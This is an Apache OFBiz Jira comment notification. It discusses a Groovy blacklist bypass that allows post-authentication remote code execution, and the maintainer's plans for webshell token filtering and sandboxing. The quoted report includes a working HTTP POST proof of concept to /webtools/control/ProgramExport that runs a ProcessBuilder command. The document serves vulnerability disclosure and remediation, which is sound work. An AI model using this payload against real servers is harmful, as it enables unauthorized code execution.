[
https://issues.apache.org/jira/browse/OFBIZ-12571?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17490786#comment-17490786
]
Jacques Le Roux edited comment on OFBIZ-12571 at 2/11/22, 9:42 AM:
-------------------------------------------------------------------
Hi Y4er,
We already had the recommendation about Groovy sandbox by thiscodecc at
OFBIZ-12305. I had a look and here was then my conclusion:
https://markmail.org/message/iwtvx3i35hbhywy7. I made a typo in the message the
link for Cedric's blog is https://melix.github.io/blog/2015/03/sandboxing.html.
There is more with
https://www.google.fr/search?q=site%3Amelix.github.io+sandbox&ie=UTF-8
I agree that it's impossible to fix the issue (and actually webshell issues at
large) with the denied deniedWebShellTokens. Yesterday browsing
https://github.com/tennc/webshell I added 2 new tokens (not yet committed):
function and class. So for now I'll commit then and will add all other cases
that you can submit here.
Later I'll have a deeper look at Groovy sandbox. I'll not close here before
having done that. It's not a priority because this is a post-auth and we have
received several vulnerability reports that I need to work on before.
TIA for your help
was (Author: jacques.le.roux):
Hi Y4er,
We already had the recommendation about Groovy sandbox by thiscodecc at
OFBIZ-12305. I had a look and here was then my conclusion:
https://markmail.org/message/iwtvx3i35hbhywy7. I made a typo in the message the
link for Cedric's blog is https://melix.github.io/blog/2015/03/sandboxing.html.
There is more with
https://www.google.fr/search?q=site%3Amelix.github.io+sandbox&ie=UTF-8
I agree that it's impossible to fix the issue (and actually webshell issues at
large) with the denied deniedWebShellTokens. Yesterday browsing
https://github.com/tennc/webshell I added 2 new tokens (not yet committed):
function and class. So for now I'll commit then and will add all other cases
that you can submit here.
Later I'll have a deeper look at Groovy sandbox, but it's not a priority
because this is a post-auth and we have received several vulnerability report
that I need to work on before. I'll not close here before having done that.
TIA for your help
> groovy blacklist bypass cause post-auth RCE from
> webtools/control/ProgramExport
> -------------------------------------------------------------------------------
>
> Key: OFBIZ-12571
> URL: https://issues.apache.org/jira/browse/OFBIZ-12571
> Project: OFBiz
> Issue Type: Bug
> Components: framework/webtools
> Affects Versions: 18.12.05
> Environment: ofbiz 18.12.05
> Reporter: Y4er
> Assignee: Jacques Le Roux
> Priority: Major
> Fix For: 18.12.06, 22.01.01
>
> Attachments: image-2022-02-10-17-50-58-914.png
>
>
> groovy blacklist bypass cause post-auth RCE from
> webtools/control/ProgramExport
>
> {code:java}
> POST /webtools/control/ProgramExport HTTP/1.1
> Host: 192.168.1.178:8443
> Cookie: JSESSIONID=256ECC64937BFB5F47A32A14B272EE8F.jvm1;
> webtools.securedLoginId=admin; OFBiz.Visitor=10302
> Content-Type: application/x-www-form-urlencoded
> Connection: close
> Content-Length: 68
> groovyProgram=ProcessBuilder.newInstance%28%22calc%22%29.start%28%29 {code}
> !image-2022-02-10-17-50-58-914.png|width=751,height=407!
--
This message was sent by Atlassian Jira
(v8.20.1#820001)
